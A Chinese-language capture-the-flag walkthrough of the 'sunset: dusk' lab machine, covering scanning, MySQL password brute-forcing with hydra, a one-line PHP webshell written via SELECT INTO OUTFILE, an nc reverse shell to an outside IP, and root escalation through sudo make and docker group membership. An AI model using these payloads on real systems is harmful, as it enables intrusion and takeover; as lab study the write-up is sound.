靶机信息

Name: sunset: dusk
Date release: 1 Dec 2019
Difficulty: Beginner
Task：boot2root

关键知识点、工具：

• 信息收集
• Mysql弱口令爆破
• Mysql写入WebShell
• WebShell反弹交互式shell
• sudo滥用提权
• 利用docker提权

渗透过程：

网络信息：

靶机IP：192.168.2.19

攻击机IP：192.168.2.20

信息收集

nmap -A -T5 192.168.2.19

目标开放21，22，25，80，3306，8080端口。

80端口是apache2默认页面，dirb目录扫描没有收获。

8080端口是个web：

有两张图片可以访问，以及得知了一个php的绝对路径。dirb目录扫描没有收获。

21，22，25端口目前信息还不足以进行相应的尝试。

mysql弱口令爆破

3306可能存在默认账号root的弱口令，使用hydra进行爆破尝试：

hydra -l root -P ../rockyou.txt 192.168.2.19 mysql

mysql弱口令爆破参考资料： https://www.freebuf.com/news/162036.html

运气还不错，root账号密码是password。

mysql写入webshell

现在知道php的绝对路径，还知道mysql的账号密码，那么可以向目标写入webshell。

mysql远程连接：

mysql -h 192.168.2.19 -p3306 -u root -ppassword

mysql远程连接参考资料：https://www.cnblogs.com/gaoBlog/p/13152720.html

写入一句话木马：

select "<?php system($_GET['s3lf']); ?>" into outfile '/var/tmp/selph.php';

由于我当前kali上没装菜刀蚁剑啥的，所以直接写成从GET方法获取命令了

这里不知道为啥，一执行命令就500，这里我把靶机重装了一遍就好了，现在靶机IP为192.168.2.21

通过GET参数执行命令：

反弹shell

nc -c bash 123.207.145.80 443

提权到dusk

cat /etc/passwd

得知用户名：dusk

sudo -l

有三个命令可以免密码使用dusk账号执行：ping,make,sl

可sudo权限滥用命令查询：https://gtfobins.github.io/#

这里的make命令可以用来提权.

sudo -u dusk make -s --eval=$'x:\n\t-'"/bin/sh"

提权到root

在dusk的shell下，不能执行sudo -l.

查看dusk账号信息：

id

docker是使用root权限运行的，dusk在docker组里，那么可以使用docker执行命令来实现提权：

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

alpine是体积超小的docker容器

不知道为啥，python弹的交互shell里面打字都会变成双写（虽然也可以识别）但,只有把命令复制黏贴进去才能不是双写的，希望知道的老哥能够指点一二。

get flag

user flag：

# cat  /home/dusk/user.txt
08ebacf8f4e43f05b8b8b372df24235b

root flag: